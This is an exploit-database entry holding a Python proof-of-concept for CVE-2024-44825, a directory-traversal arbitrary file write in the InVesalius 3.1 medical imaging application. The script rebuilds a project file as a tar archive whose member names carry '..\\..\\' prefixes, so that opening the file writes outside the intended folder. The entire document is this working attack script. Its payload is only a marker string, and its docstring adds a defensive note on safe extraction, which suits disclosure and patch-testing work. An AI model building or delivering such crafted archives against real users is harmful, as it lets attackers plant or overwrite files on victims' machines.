## https://sploitus.com/exploit?id=PACKETSTORM:181738
# Exploit Title: Invesalius 3.1 - Arbitrary File Write using Directory Traversal   
# Discovered By: Riccardo Degli Esposti (partywave)  
# Exploit Author: Riccardo Degli Esposti (partywave)  
# Vendor Homepage: https://invesalius.github.io/  
# Software Link: https://github.com/invesalius/invesalius3/tree/master/invesalius  
# Version: from 3.1.99995  
# Tested on: Windows  
# CVE-ID: CVE-2024-44825  
  
import tarfile  
import os  
import zipfile  
  
# Disclaimer:  
# Tested on Windows  
# Edit every [CHANGEME] placeholder before running this script  
  
# Step 0: Local working paths for the proof of concept (Windows-style paths).
# Every [CHANGEME] is a placeholder that has to be filled in by hand.
zip_file_path = "C:\\users\\[CHANGEME]\\downloads\\[CHANGEME].zip"
extracted_folder = "C:\\users\\[CHANGEME]\\downloads\\[CHANGEME]"
output_tar = "C:\\users\\[CHANGEME]\\downloads\\local-output.inv3"

# The script expects main.plist directly inside the unpacked folder.
main_plist_path = os.path.join(extracted_folder, "main.plist")

# Create the unpack directory up front; an already existing one is reused.
os.makedirs(extracted_folder, exist_ok=True)
  
# Step 1: Unpack the sample project ZIP into the working directory.
with zipfile.ZipFile(zip_file_path, "r") as sample_zip:
    sample_zip.extractall(extracted_folder)

# Step 2: Replace one metadata string in main.plist with a visible marker.
# The marker only shows that the edited plist was the one loaded; note that
# str.replace() leaves the text untouched when the original string is absent.
original_entry = '<string>ProMED CT 0051</string>'
marker_entry = '<string>This is a confirmation modifying the XML</string>'

with open(main_plist_path, "r") as plist_in:
    original_plist = plist_in.read()

main_plist_content = original_plist.replace(original_entry, marker_entry)

with open(main_plist_path, "w") as plist_out:
    plist_out.write(main_plist_content)
  
# Step 3: Create the tar archive
# The [CHANGEME] part of the prefix below is a placeholder set by hand.
def rename(tarinfo):
    """Prefix a tar member's stored name with parent-directory components.

    Used as the ``filter`` callback of ``TarFile.add``: it receives a
    ``TarInfo``, prepends a relative ``..`` prefix to its ``name`` and
    returns the same object.

    Defensive note: member names of this shape are the input behind
    CVE-2024-44825. Code that unpacks project archives should resolve each
    member path against the destination directory and refuse any that end
    up outside it; on Python versions that provide tarfile extraction
    filters, ``extractall(..., filter="data")`` performs that check.
    """
    traversal_prefix = "..\\..\\[CHANGEME]\\"
    tarinfo.name = traversal_prefix + tarinfo.name
    return tarinfo
  
# Pack every file under extracted_folder into an xz-compressed tar written to
# output_tar. Each member is added under its path relative to
# extracted_folder, and the rename filter then rewrites the stored name.
with tarfile.open(output_tar, "w:xz") as archive:
    for dirpath, _dirnames, filenames in os.walk(extracted_folder):
        for filename in filenames:
            source_path = os.path.join(dirpath, filename)
            member_name = os.path.relpath(source_path, extracted_folder)
            archive.add(source_path, arcname=member_name, filter=rename)

# Bare expression: it only displays the output path in an interactive
# session and has no effect when the file runs as a script.
output_tar